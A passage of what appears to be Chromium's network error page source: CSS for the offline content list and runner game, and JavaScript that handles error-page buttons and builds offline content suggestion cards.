  border-color: rgb(218, 220, 224);
}

#offline-content-list-visibility-card > div {
  padding: 1em;
}

#offline-content-list-title {
  color: var(--google-gray-700);
}

#offline-content-list-show-text,
#offline-content-list-hide-text {
  color: rgb(66, 133, 244);
}

/* Hides the "hide" text div when the offline content list is collapsed/hidden
 * and, alternatively, hides the "show" text div when the offline content list
 * is expanded/shown.
 */
#offline-content-list.list-hidden #offline-content-list-hide-text,
#offline-content-list:not(.list-hidden) #offline-content-list-show-text {
  display: none;
}

/* Controls the animation of the offline content list when it is expanded/shown.
 */
#offline-content-suggestions {
  /* Max-height has to be set for the height animation to work. The chosen value
   * is a little greater than the maximum height the list will have, when all
   * suggestions have images, so that it is never clamped. This makes so that
   * when the actual height is smaller then the animation is not as smooth.
   */
  max-height: 27em;
  transition: max-height 200ms ease-in, visibility 0s 200ms,
              opacity 200ms 200ms linear;
}

/* Controls the animation of the offline content list when it is
 * collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-suggestions {
  max-height: 0;
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms,
              max-height 200ms 200ms ease-out;
  visibility: hidden;
}

#offline-content-list {
  margin-inline-start: -5%;
  width: 110%;
}

/* The selectors below adjust the "overflow" of the suggestion cards contents
 * based on the same screen size based strategy used for the main frame, which
 * is applied by the `interstitial-wrapper` class. */
@media (max-width: 420px)  {
  #offline-content-list {
    margin-inline-start: -2.5%;
    width: 105%;
  }
}
@media (max-width: 420px) and (orientation: portrait),
       (max-height: 560px) {
  #offline-content-list {
    margin-inline-start: -12px;
    width: calc(100% + 24px);
  }
}

.suggestion-with-image .offline-content-suggestion-thumbnail {
  flex-basis: 8.2em;
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-thumbnail > img {
  height: 100%;
  width: 100%;
}

.suggestion-with-image #offline-content-list:not(.is-rtl)
.offline-content-suggestion-thumbnail > img {
  border-bottom-right-radius: 7px;
  border-top-right-radius: 7px;
}

.suggestion-with-image #offline-content-list.is-rtl
.offline-content-suggestion-thumbnail > img {
  border-bottom-left-radius: 7px;
  border-top-left-radius: 7px;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail {
  align-items: center;
  display: flex;
  justify-content: center;
  min-height: 4.2em;
  min-width: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div {
  align-items: center;
  background-color: rgb(241, 243, 244);
  border-radius: 50%;
  display: flex;
  height: 2.3em;
  justify-content: center;
  width: 2.3em;
}

.suggestion-with-icon .offline-content-suggestion-thumbnail > div > img {
  height: 1.45em;
  width: 1.45em;
}

.offline-content-suggestion-favicon {
  height: 1em;
  margin-inline-end: 0.4em;
  width: 1.4em;
}

.offline-content-suggestion-favicon > img {
  height: 1.4em;
  width: 1.4em;
}

.no-favicon .offline-content-suggestion-favicon {
  display: none;
}

.image-video {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTcgMTAuNVY3YTEgMSAwIDAgMC0xLTFINGExIDEgMCAwIDAtMSAxdjEwYTEgMSAwIDAgMCAxIDFoMTJhMSAxIDAgMCAwIDEtMXYtMy41bDQgNHYtMTFsLTQgNHoiIGZpbGw9IiMzQzQwNDMiLz48L3N2Zz4=);
}

.image-music-note {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTIgM3Y5LjI2Yy0uNS0uMTctMS0uMjYtMS41LS4yNkM4IDEyIDYgMTQgNiAxNi41UzggMjEgMTAuNSAyMXM0LjUtMiA0LjUtNC41VjZoNFYzaC03eiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-earth {
  content: url(data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cGF0aCBkPSJNMTIgMmM1LjUyIDAgMTAgNC40OCAxMCAxMHMtNC40OCAxMC0xMCAxMFMyIDE3LjUyIDIgMTIgNi40OCAyIDEyIDJ6TTQgMTJoNC40YzMuNDA3LjAyMiA0LjkyMiAxLjczIDQuNTQzIDUuMTI3SDkuNDg4djIuNDdhOC4wMDQgOC4wMDQgMCAwIDAgMTAuNDk4LTguMDgzQzE5LjMyNyAxMi41MDQgMTguMzMyIDEzIDE3IDEzYy0yLjEzNyAwLTMuMjA2LS45MTYtMy4yMDYtMi43NWgtMy43NDhjLS4yNzQtMi43MjguNjgzLTQuMDkyIDIuODctNC4wOTIgMC0uOTc1LjMyNy0xLjU5Ny44MTEtMS45N0E4LjAwNCA4LjAwNCAwIDAgMCA0IDEyeiIgZmlsbD0iIzNDNDA0MyIvPjwvc3ZnPg==);
}

.image-file {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNMTMgOVYzLjVMMTguNSA5TTYgMmMtMS4xMSAwLTIgLjg5LTIgMnYxNmEyIDIgMCAwIDAgMiAyaDEyYTIgMiAwIDAgMCAyLTJWOGwtNi02SDZ6IiBmaWxsPSIjM0M0MDQzIi8+PC9zdmc+);
}

.offline-content-suggestion-texts {
  display: flex;
  flex-direction: column;
  justify-content: space-between;
  line-height: 1.3;
  padding: .9em;
  width: 100%;
}

.offline-content-suggestion-title {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 3;
  color: rgb(32, 33, 36);
  display: -webkit-box;
  font-size: 1.1em;
  overflow: hidden;
  text-overflow: ellipsis;
}

div.offline-content-suggestion {
  align-items: stretch;
  border: 1px solid rgb(218, 220, 224);
  border-radius: 8px;
  display: flex;
  justify-content: space-between;
  margin-bottom: .8em;
}

.suggestion-with-image {
  flex-direction: row;
  height: 8.2em;
  max-height: 8.2em;
}

.suggestion-with-icon {
  flex-direction: row-reverse;
  height: 4.2em;
  max-height: 4.2em;
}

.suggestion-with-icon .offline-content-suggestion-title {
  -webkit-line-clamp: 1;
  word-break: break-all;
}

.suggestion-with-icon .offline-content-suggestion-texts {
  padding-inline-start: 0;
}

.offline-content-suggestion-attribution-freshness {
  color: rgb(95, 99, 104);
  display: flex;
  font-size: .8em;
  line-height: 1.7em;
}

.offline-content-suggestion-attribution {
  -webkit-box-orient: vertical;
  -webkit-line-clamp: 1;
  display: -webkit-box;
  flex-shrink: 1;
  margin-inline-end: 0.3em;
  overflow: hidden;
  overflow-wrap: break-word;
  text-overflow: ellipsis;
  word-break: break-all;
}

.no-attribution .offline-content-suggestion-attribution {
  display: none;
}

.offline-content-suggestion-freshness::before {
  content: '-';
  display: inline-block;
  flex-shrink: 0;
  margin-inline-end: .1em;
  margin-inline-start: .1em;
}

.no-attribution .offline-content-suggestion-freshness::before {
  display: none;
}

.offline-content-suggestion-freshness {
  flex-shrink: 0;
}

.suggestion-with-image .offline-content-suggestion-pin-spacer {
  flex-grow: 100;
  flex-shrink: 1;
}

.suggestion-with-image .offline-content-suggestion-pin {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2aWV3Qm94PSIwIDAgMjQgMjQiIHdpZHRoPSIyNCIgaGVpZ2h0PSIyNCI+PGRlZnM+PHBhdGggaWQ9ImEiIGQ9Ik0wIDBoMjR2MjRIMFYweiIvPjwvZGVmcz48Y2xpcFBhdGggaWQ9ImIiPjx1c2UgeGxpbms6aHJlZj0iI2EiIG92ZXJmbG93PSJ2aXNpYmxlIi8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjYikiIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9zdmc+);
  flex-shrink: 0;
  height: 1.4em;
  margin-inline-start: .4em;
  width: 1.4em;
}

/* Controls the animation (and a bit more) of the launch-downloads-home action
 * button when the offline content list is expanded/shown.
 */
#offline-content-list-action {
  text-align: center;
  transition: visibility 0s 200ms, opacity 200ms 200ms linear;
}

/* Controls the animation of the launch-downloads-home action button when the
 * offline content list is collapsed/hidden.
 */
#offline-content-list.list-hidden #offline-content-list-action {
  opacity: 0;
  transition: opacity 200ms linear, visibility 0s 200ms;
  visibility: hidden;
}

#cancel-save-page-button {
  background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAyNCAyNCIgd2lkdGg9IjI0IiBoZWlnaHQ9IjI0Ij48Y2xpcFBhdGggaWQ9Im1hc2siPjxwYXRoIGQ9Ik0xMiAyQzYuNSAyIDIgNi41IDIgMTJzNC41IDEwIDEwIDEwIDEwLTQuNSAxMC0xMFMxNy41IDIgMTIgMnptNSAxNkg3di0yaDEwdjJ6bS02LjctNEw3IDEwLjdsMS40LTEuNCAxLjkgMS45IDUuMy01LjNMMTcgNy4zIDEwLjMgMTR6IiBmaWxsPSIjOUFBMEE2Ii8+PC9jbGlwUGF0aD48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiM5QUEwQTYiIGQ9Ik0wIDBoMjR2MjRIMHoiLz48cGF0aCBjbGlwLXBhdGg9InVybCgjbWFzaykiIGZpbGw9IiMxQTczRTgiIHN0eWxlPSJhbmltYXRpb246b2ZmbGluZUFuaW1hdGlvbiA0cyBpbmZpbml0ZSIgZD0iTTAgMGgyNHYyNEgweiIvPjxzdHlsZT5Aa2V5ZnJhbWVzIG9mZmxpbmVBbmltYXRpb257MCUsMzUle2hlaWdodDowfTYwJXtoZWlnaHQ6MTAwJX05MCV7ZmlsbC1vcGFjaXR5OjF9dG97ZmlsbC1vcGFjaXR5OjB9fTwvc3R5bGU+PC9zdmc+);
  background-position: right 27px center;
  background-repeat: no-repeat;
  border: 1px solid var(--google-gray-300);
  border-radius: 5px;
  color: var(--google-gray-700);
  margin-bottom: 26px;
  padding-bottom: 16px;
  padding-inline-end: 88px;
  padding-inline-start: 16px;
  padding-top: 16px;
  text-align: start;
}

html[dir='rtl'] #cancel-save-page-button {
  background-position: left 27px center;
}

#save-page-for-later-button {
  display: flex;
  justify-content: start;
}

#save-page-for-later-button a::before {
  content: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIxLjJlbSIgaGVpZ2h0PSIxLjJlbSIgdmlld0JveD0iMCAwIDI0IDI0Ij48cGF0aCBkPSJNNSAyMGgxNHYtMkg1bTE0LTloLTRWM0g5djZINWw3IDcgNy03eiIgZmlsbD0iIzQyODVGNCIvPjwvc3ZnPg==);
  display: inline-block;
  margin-inline-end: 4px;
  vertical-align: -webkit-baseline-middle;
}

.hidden#save-page-for-later-button {
  display: none;
}

/* Don't allow overflow when in a subframe. */
html[subframe] body {
  overflow: hidden;
}

#sub-frame-error {
  -webkit-align-items: center;
  -webkit-flex-flow: column;
  -webkit-justify-content: center;
  background-color: #DDD;
  display: -webkit-flex;
  height: 100%;
  left: 0;
  position: absolute;
  text-align: center;
  top: 0;
  transition: background-color 200ms ease-in-out;
  width: 100%;
}

#sub-frame-error:hover {
  background-color: #EEE;
}

#sub-frame-error .icon-generic {
  margin: 0 0 16px;
}

#sub-frame-error-details {
  margin: 0 10px;
  text-align: center;
  visibility: hidden;
}

/* Show details only when hovering. */
#sub-frame-error:hover #sub-frame-error-details {
  visibility: visible;
}

/* If the iframe is too small, always hide the error code. */
/* TODO(mmenke): See if overflow: no-display works better, once supported. */
@media (max-width: 200px), (max-height: 95px) {
  #sub-frame-error-details {
    display: none;
  }
}

/* Adjust icon for small embedded frames in apps. */
@media (max-height: 100px) {
  #sub-frame-error .icon-generic {
    height: auto;
    margin: 0;
    padding-top: 0;
    width: 25px;
  }
}

/* details-button is special; it's a <button> element that looks like a link. */
#details-button {
  box-shadow: none;
  min-width: 0;
}

/* Styles for platform dependent separation of controls and details button. */
.suggested-left > #control-buttons,
.suggested-right > #details-button {
  float: left;
}

.suggested-right > #control-buttons,
.suggested-left > #details-button {
  float: right;
}

.suggested-left .secondary-button {
  margin-inline-end: 0;
  margin-inline-start: 16px;
}

#details-button.singular {
  float: none;
}

/* download-button shows both icon and text. */
#download-button {
  padding-bottom: 4px;
  padding-top: 4px;
  position: relative;
}

#download-button::before {
  background: -webkit-image-set(
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABgAAAAYCAQAAABKfvVzAAAAO0lEQVQ4y2NgGArgPxIY1YChsOE/LtBAmpYG0mxpIOSDBpKUo2lpIDZxNJCkHKqlYZAla3RAHQ1DFgAARRroHyLNTwwAAAAASUVORK5CYII=) 1x,
      url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAQAAAD9CzEMAAAAZElEQVRYw+3Ruw3AMAwDUY3OzZUmRRD4E9iim9wNwAdbEURHyk4AAAAATiCVK8lLyPsKeT9K3lsownnunfkPxO78hKiYHxBV8x2icr5BVM+/CMf8g3DN34Rzns6ViwHUAUQ/6wIAd5Km7l6c8AAAAABJRU5ErkJggg==) 2x)
    no-repeat;
  content: '';
  display: inline-block;
  height: 24px;
  margin-inline-end: 4px;
  margin-inline-start: -4px;
  vertical-align: middle;
  width: 24px;
}

#download-button:disabled {
  background: rgb(180, 206, 249);
  color: rgb(255, 255, 255);
}

#buttons::after {
  clear: both;
  content: '';
  display: block;
  width: 100%;
}

/* Offline page */
html[dir='rtl'] .runner-container,
html[dir='rtl'].offline .icon-offline {
  transform: scaleX(-1);
}

.offline {
  transition: filter 1.5s cubic-bezier(0.65, 0.05, 0.36, 1),
              background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);

  will-change: filter, background-color;

}

.offline body {
  transition: background-color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
}

.offline #main-message > p {
  display: none;
}

.offline.inverted {
  background-color: #fff;
  filter: invert(1);
}

.offline.inverted body {
  background-color: #fff;
}

.offline .interstitial-wrapper {
  color: var(--text-color);
  font-size: 1em;
  line-height: 1.55;
  margin: 0 auto;
  max-width: 600px;
  padding-top: 100px;
  position: relative;
  width: 100%;
}

.offline .runner-container {
  direction: ltr;
  height: 150px;
  max-width: 600px;
  overflow: hidden;
  position: absolute;
  top: 35px;
  width: 44px;
}

.offline .runner-container:focus {
  outline: none;
}

.offline .runner-container:focus-visible {
  outline: 3px solid var(--google-blue-300);
}

.offline .runner-canvas {
  height: 150px;
  max-width: 600px;
  opacity: 1;
  overflow: hidden;
  position: absolute;
  top: 0;
  z-index: 10;
}

.offline .controller {
  height: 100vh;
  left: 0;
  position: absolute;
  top: 0;
  width: 100vw;
  z-index: 9;
}

#offline-resources {
  display: none;
}

#offline-instruction {
  image-rendering: pixelated;
  left: 0;
  margin: auto;
  position: absolute;
  right: 0;
  top: 60px;
  width: fit-content;
}

.offline-runner-live-region {
  bottom: 0;
  clip-path: polygon(0 0, 0 0, 0 0);
  color: var(--background-color);
  display: block;
  font-size: xx-small;
  overflow: hidden;
  position: absolute;
  text-align: center;
  transition: color 1.5s cubic-bezier(0.65, 0.05, 0.36, 1);
  user-select: none;
}

/* Custom toggle */
.slow-speed-option {
  align-items: center;
  background: var(--google-gray-50);
  border-radius: 24px/50%;
  bottom: 0;
  color: var(--error-code-color);
  display: inline-flex;
  font-size: 1em;
  left: 0;
  line-height: 1.1em;
  margin: 5px auto;
  padding: 2px 12px 3px 20px;
  position: absolute;
  right: 0;
  width: max-content;
  z-index: 999;
}

.slow-speed-option.hidden {
  display: none;
}

.slow-speed-option [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle {
  cursor: pointer;
  margin-inline-start: 8px;
  padding: 8px 4px;
  position: relative;
}

.slow-speed-option [type=checkbox]:disabled ~ .slow-speed-toggle {
  cursor: default;
}

.slow-speed-option-label [type=checkbox] {
  opacity: 0;
  pointer-events: none;
  position: absolute;
}

.slow-speed-option .slow-speed-toggle::before,
.slow-speed-option .slow-speed-toggle::after {
  content: '';
  display: block;
  margin: 0 3px;
  transition: all 100ms cubic-bezier(0.4, 0, 1, 1);
}

.slow-speed-option .slow-speed-toggle::before {
  background: rgb(189,193,198);
  border-radius: 0.65em;
  height: 0.9em;
  width: 2em;
}

.slow-speed-option .slow-speed-toggle::after {
  background: #fff;
  border-radius: 50%;
  box-shadow: 0 1px 3px 0 rgb(0 0 0 / 40%);
  height: 1.2em;
  position: absolute;
  top: 51%;
  transform: translate(-20%, -50%);
  width: 1.1em;
}

.slow-speed-option [type=checkbox]:focus + .slow-speed-toggle {
  box-shadow: 0 0 8px rgb(94, 158, 214);
  outline: 1px solid rgb(93, 157, 213);
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
  background: var(--google-blue-600);
  opacity: 0.5;
}

.slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after {
  background: var(--google-blue-600);
  transform: translate(calc(2em - 90%), -50%);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::before {
  background: rgb(189,193,198);
}

.slow-speed-option [type=checkbox]:checked:disabled +
  .slow-speed-toggle::after {
  background: var(--google-gray-50);
}

@media (max-width: 420px) {
  #download-button {
    padding-bottom: 12px;
    padding-top: 12px;
  }

  .suggested-left > #control-buttons,
  .suggested-right > #control-buttons {
    float: none;
  }

  .snackbar {
    border-radius: 0;
    bottom: 0;
    left: 0;
    width: 100%;
  }
}

@media (max-height: 350px) {
  h1 {
    margin: 0 0 15px;
  }

  .icon-offline {
    margin: 0 0 10px;
  }

  .interstitial-wrapper {
    margin-top: 5%;
  }

  .nav-wrapper {
    margin-top: 30px;
  }
}

@media (min-width: 420px) and (max-width: 736px) and
       (min-height: 240px) and (max-height: 420px) and
       (orientation:landscape) {
  .interstitial-wrapper {
    margin-bottom: 100px;
  }
}

@media (max-width: 360px) and (max-height: 480px) {
  .offline .interstitial-wrapper {
    padding-top: 60px;
  }

  .offline .runner-container {
    top: 8px;
  }
}

@media (min-height: 240px) and (orientation: landscape) {
  .offline .interstitial-wrapper {
    margin-bottom: 90px;
  }

  .icon-offline {
    margin-bottom: 20px;
  }
}

@media (max-height: 320px) and (orientation: landscape) {
  .icon-offline {
    margin-bottom: 0;
  }

  .offline .runner-container {
    top: 10px;
  }
}

@media (max-width: 240px) {
  button {
    padding-inline-end: 12px;
    padding-inline-start: 12px;
  }

  .interstitial-wrapper {
    overflow: inherit;
    padding: 0 8px;
  }
}

@media (max-width: 120px) {
  button {
    width: auto;
  }
}

.arcade-mode,
.arcade-mode .runner-container,
.arcade-mode .runner-canvas {
  image-rendering: pixelated;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode #buttons,
.arcade-mode #main-content {
  opacity: 0;
  overflow: hidden;
}

.arcade-mode .interstitial-wrapper {
  height: 100vh;
  max-width: 100%;
  overflow: hidden;
}

.arcade-mode .runner-container {
  left: 0;
  margin: auto;
  right: 0;
  transform-origin: top center;
  transition: transform 250ms cubic-bezier(0.4, 0, 1, 1) 400ms;
  z-index: 2;
}

@media (prefers-color-scheme: dark) {
  .icon {
    filter: invert(1);
  }

  .offline .runner-canvas {
    filter: invert(1);
  }

  .offline.inverted {
    background-color: var(--background-color);
    filter: invert(0);
  }

  .offline.inverted body {
    background-color: #fff;
  }

  .offline.inverted .offline-runner-live-region {
    color: #fff;
  }

  #suggestions-list a {
    color: var(--link-color);
  }

  #error-information-button {
    filter: invert(0.6);
  }

  .slow-speed-option {
    background: var(--google-gray-800);
    color: var(--google-gray-100);
  }

  .slow-speed-option .slow-speed-toggle::before,
  .slow-speed-option [type=checkbox]:checked:disabled +
    .slow-speed-toggle::before {
     background: rgb(189,193,198);
  }

  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::after,
  .slow-speed-option [type=checkbox]:checked + .slow-speed-toggle::before {
    background: var(--google-blue-300);
  }
}
</style>
  <script>// Copyright 2013 The Chromium Authors
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

/**
 * @typedef {{
 *   downloadButtonClick: function(),
 *   reloadButtonClick: function(string),
 *   detailsButtonClick: function(),
 *   diagnoseErrorsButtonClick: function(),
 *   trackEasterEgg: function(),
 *   updateEasterEggHighScore: function(number),
 *   resetEasterEggHighScore: function(),
 *   launchOfflineItem: function(string, string),
 *   savePageForLater: function(),
 *   cancelSavePage: function(),
 *   listVisibilityChange: function(boolean),
 * }}
 */
// eslint-disable-next-line no-var
var errorPageController;

const HIDDEN_CLASS = 'hidden';

// Decodes a UTF16 string that is encoded as base64.
function decodeUTF16Base64ToString(encoded_text) {
  const data = atob(encoded_text);
  let result = '';
  for (let i = 0; i < data.length; i += 2) {
    result +=
        String.fromCharCode(data.charCodeAt(i) * 256 + data.charCodeAt(i + 1));
  }
  return result;
}

function toggleHelpBox() {
  const helpBoxOuter = document.getElementById('details');
  helpBoxOuter.classList.toggle(HIDDEN_CLASS);
  const detailsButton = document.getElementById('details-button');
  if (helpBoxOuter.classList.contains(HIDDEN_CLASS)) {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.detailsText;
  } else {
    /** @suppress {missingProperties} */
    detailsButton.innerText = detailsButton.hideDetailsText;
  }

  // Details appears over the main content on small screens.
  if (mobileNav) {
    document.getElementById('main-content').classList.toggle(HIDDEN_CLASS);
    const runnerContainer = document.querySelector('.runner-container');
    if (runnerContainer) {
      runnerContainer.classList.toggle(HIDDEN_CLASS);
    }
  }
}

function diagnoseErrors() {
  if (window.errorPageController) {
    errorPageController.diagnoseErrorsButtonClick();
  }
}

// Subframes use a different layout but the same html file.  This is to make it
// easier to support platforms that load the error page via different
// mechanisms (Currently just iOS). We also use the subframe style for portals
// as they are embedded like subframes and can't be interacted with by the user.
let isSubFrame = false;
if (window.top.location !== window.location || window.portalHost) {
  document.documentElement.setAttribute('subframe', '');
  isSubFrame = true;
}

// Re-renders the error page using |strings| as the dictionary of values.
// Used by NetErrorTabHelper to update DNS error pages with probe results.
function updateForDnsProbe(strings) {
  const context = new JsEvalContext(strings);
  jstProcess(context, document.getElementById('t'));
  onDocumentLoadOrUpdate();
}

// Adds an icon class to the list and removes classes previously set.
function updateIconClass(newClass) {
  const frameSelector = isSubFrame ? '#sub-frame-error' : '#main-frame-error';
  const iconEl = document.querySelector(frameSelector + ' .icon');

  if (iconEl.classList.contains(newClass)) {
    return;
  }

  iconEl.className = 'icon ' + newClass;
}

// Implements button clicks.  This function is needed during the transition
// between implementing these in trunk chromium and implementing them in iOS.
function reloadButtonClick(url) {
  if (window.errorPageController) {
    // 

    // 
    errorPageController.reloadButtonClick();
    // 
  } else {
    window.location = url;
  }
}

function downloadButtonClick() {
  if (window.errorPageController) {
    errorPageController.downloadButtonClick();
    const downloadButton = document.getElementById('download-button');
    downloadButton.disabled = true;
    /** @suppress {missingProperties} */
    downloadButton.textContent = downloadButton.disabledText;

    document.getElementById('download-link-wrapper')
        .classList.add(HIDDEN_CLASS);
    document.getElementById('download-link-clicked-wrapper')
        .classList.remove(HIDDEN_CLASS);
  }
}

function detailsButtonClick() {
  if (window.errorPageController) {
    errorPageController.detailsButtonClick();
  }
}

let primaryControlOnLeft = true;
// clang-format off
// 
// clang-format on
primaryControlOnLeft = false;
// 

function setAutoFetchState(scheduled, can_schedule) {
  document.getElementById('cancel-save-page-button')
      .classList.toggle(HIDDEN_CLASS, !scheduled);
  document.getElementById('save-page-for-later-button')
      .classList.toggle(HIDDEN_CLASS, scheduled || !can_schedule);
}

function savePageLaterClick() {
  errorPageController.savePageForLater();
  // savePageForLater will eventually trigger a call to setAutoFetchState() when
  // it completes.
}

function cancelSavePageClick() {
  errorPageController.cancelSavePage();
  // setAutoFetchState is not called in response to cancelSavePage(), so do it
  // now.
  setAutoFetchState(false, true);
}

function toggleErrorInformationPopup() {
  document.getElementById('error-information-popup-container')
      .classList.toggle(HIDDEN_CLASS);
}

function launchOfflineItem(itemID, name_space) {
  errorPageController.launchOfflineItem(itemID, name_space);
}

function launchDownloadsPage() {
  errorPageController.launchDownloadsPage();
}

function getIconForSuggestedItem(item) {
  // Note: |item.content_type| contains the enum values from
  // chrome::mojom::AvailableContentType.
  switch (item.content_type) {
    case 1:  // kVideo
      return 'image-video';
    case 2:  // kAudio
      return 'image-music-note';
    case 0:  // kPrefetchedPage
    case 3:  // kOtherPage
      return 'image-earth';
  }
  return 'image-file';
}

function getSuggestedContentDiv(item, index) {
  // Note: See AvailableContentToValue in available_offline_content_helper.cc
  // for the data contained in an |item|.
  // TODO(carlosk): Present |snippet_base64| when that content becomes
  // available.
  let thumbnail = '';
  const extraContainerClasses = [];
  // html_inline.py will try to replace src attributes with data URIs using a
  // simple regex. The following is obfuscated slightly to avoid that.
  const source = 'src';
  if (item.thumbnail_data_uri) {
    extraContainerClasses.push('suggestion-with-image');
    thumbnail = `<img ${source}="${item.thumbnail_data_uri}">`;
  } else {
    extraContainerClasses.push('suggestion-with-icon');
    const iconClass = getIconForSuggestedItem(item);
    thumbnail = `<div><img class="${iconClass}"></div>`;
  }

  let favicon = '';
  if (item.favicon_data_uri) {
    favicon = `<img ${source}="${item.favicon_data_uri}">`;
  } else {
    extraContainerClasses.push('no-favicon');
  }

  if (!item.attribution_base64) {
    extraContainerClasses.push('no-attribution');
  }

  return `
  <div class="offline-content-suggestion ${extraContainerClasses.join(' ')}"
    onclick="launchOfflineItem('${item.ID}', '${item.name_space}')">
      <div class="offline-content-suggestion-texts">
        <div id="offline-content-suggestion-title-${index}"
             class="offline-content-suggestion-title">
        </div>
        <div class="offline-content-suggestion-attribution-freshness">
          <div id="offline-content-suggestion-favicon-${index}"
               class="offline-content-suggestion-favicon">
            ${favicon}
          </div>
          <div id="offline-content-suggestion-attribution-${index}"
               class="offline-content-suggestion-attribution">
          </div>
          <div class="offline-content-suggestion-freshness">
            ${item.date_modified}
          </div>
          <div class="offline-content-suggestion-pin-spacer"></div>
          <div class="offline-content-suggestion-pin"></div>
        </div>
      </div>
      <div class="offline-content-suggestion-thumbnail">
        ${thumbnail}
      </div>
  </div>`;
}

/**
 * @typedef {{
 *   ID: string,
 *   name_space: string,
 *   title_base64: string,
 *   snippet_base64: string,
 *   date_modified: string,
 *   attribution_base64: string,
 *   thumbnail_data_uri: string,
 *   favicon_data_uri: string,
 *   content_type: number,
 * }}
 */
let AvailableOfflineContent;

// Populates a list of suggested offline content.
// Note: For security reasons all content downloaded from the web is considered
// unsafe and must be securely handled to be presented on the dino page. Images
// have already been safely re-encoded but textual content -- like title and
// attribution -- must be properly handled here.
// @param {boolean} isShown
// @param {Array<AvailableOfflineContent>} suggestions
function offlineContentAvailable(isShown, suggestions) {
  if (!suggestions || !loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const suggestionsHTML = [];
  for (let index = 0; index < suggestions.length; index++) {
    suggestionsHTML.push(getSuggestedContentDiv(suggestions[index], index));
  }

  document.getElementById('offline-content-suggestions').innerHTML =
      suggestionsHTML.join('\n');

  // Sets textual web content using |textContent| to make sure it's handled as
  // plain text.
  for (let index = 0; index < suggestions.length; index++) {
    document.getElementById(`offline-content-suggestion-title-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].title_base64);
    document.getElementById(`offline-content-suggestion-attribution-${index}`)
        .textContent =
        decodeUTF16Base64ToString(suggestions[index].attribution_base64);
  }

  const contentListElement = document.getElementById('offline-content-list');
  if (document.dir === 'rtl') {
    contentListElement.classList.add('is-rtl');
  }
  contentListElement.hidden = false;
  // The list is configured as hidden by default. Show it if needed.
  if (isShown) {
    toggleOfflineContentListVisibility(false);
  }
}

function toggleOfflineContentListVisibility(updatePref) {
  if (!loadTimeData.valueExists('offlineContentList')) {
    return;
  }

  const contentListElement = document.getElementById('offline-content-list');
  const isVisible = !contentListElement.classList.toggle('list-hidden');

  if (updatePref && window.errorPageController) {
    errorPageController.listVisibilityChanged(isVisible);
  }
}

// Called on document load, and from updateForDnsProbe().
function onDocumentLoadOrUpdate() {
  const downloadButtonVisible = loadTimeData.valueExists('downloadButton') &&
      loadTimeData.getValue('downloadButton').msg;
  const detailsButton = document.getElementById('details-button');

  // If offline content suggestions will be visible, the usual buttons will not
  // be presented.
  const offlineContentVisible =
      loadTimeData.valueExists('suggestedOfflineContentPresentation');
  if (offlineContentVisible) {
    document.querySelector('.nav-wrapper').classList.add(HIDDEN_CLASS);
    detailsButton.classList.add(HIDDEN_CLASS);

    document.getElementById('download-link').hidden = !downloadButtonVisible;
    document.getElementById('download-links-wrapper')
        .classList.remove(HIDDEN_CLASS);
    document.getElementById('error-information-popup-container')
        .classList.add('use-popup-container', HIDDEN_CLASS);
    document.getElementById('error-information-button')
        .classList.remove(HIDDEN_CLASS);
  }

  const attemptAutoFetch = loadTimeData.valueExists('attemptAutoFetch') &&
